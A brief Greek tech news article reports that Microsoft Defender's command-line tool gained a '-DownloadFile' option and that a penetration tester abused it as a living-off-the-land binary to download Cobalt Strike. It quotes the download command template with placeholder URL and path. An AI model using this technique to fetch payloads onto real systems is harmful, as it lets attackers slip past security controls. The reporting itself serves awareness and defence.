Σύμφωνα με τις αναφορές του Techradar, στην έκδοση 4.18.2007.9 ή 4.18.2009.9 του Microsoft Defender, η Microsoft έχει προσθέσει τη δυνατότητα λήψης αρχείων μέσω της γραμμής εντολών. Ωστόσο, σύμφωνα με τον ελεγκτή διείσδυσης Mohammad Askar, οι αλλαγές στο εργαλείο γραμμής εντολών του Microsoft Defender ενδέχεται να επιτρέψουν στους εισβολείς να το χρησιμοποιήσουν για τη λήψη κακόβουλων προγραμμάτων.
Το iTechNews.gr έμαθε ότι υπάρχουν πολλά LOLBins στα Windows 10 και όλα έχουν νόμιμες λειτουργίες. Ωστόσο, με τα κατάλληλα προνόμια, οι χάκερ μπορούν να κάνουν κατάχρηση αυτών των δυαδικών αρχείων για να παρακάμψουν τις εγκαταστάσεις ασφαλείας και να πραγματοποιήσουν επιθέσεις χωρίς να ενημερώσουν το θύμα.
Όπως δήλωσε ο Askar, το εργαλείο γραμμής εντολών του Microsoft Defender υποστηρίζει τώρα τη νέα δυνατότητα “-DownloadFile”. Ένας εισβολέας μπορεί να χρησιμοποιήσει το βοηθητικό πρόγραμμα γραμμής εντολών της υπηρεσίας Anti-Malware της Microsoft για τη λήψη αρχείων από το Διαδίκτυο με την ακόλουθη εντολή: “MpCmdRun.exe -DownloadFile -url <url> -path> local-path>“.
Με αυτόν τον τρόπο, ο Askar μπόρεσε να κατεβάσει το κακόβουλο λογισμικό Cobalt Strike από μια απομακρυσμένη τοποθεσία απευθείας μέσω του Microsoft Defender.
Παρόλο που το Defender μπορεί να εντοπίσει και να μετριάσει τυχόν κακόβουλα αρχεία που έχουν ληφθεί χρησιμοποιώντας αυτήν τη μέθοδο, δεν είναι σαφές εάν άλλες δημοφιλείς υπηρεσίες προστασίας από ιούς μπορούν να υπερασπιστούν από αυτήν τη μέθοδο επίθεσης όταν είναι απενεργοποιημένη η εγγενής προστασία.
[signoff]
Πηγή: https://www.ithome.com/
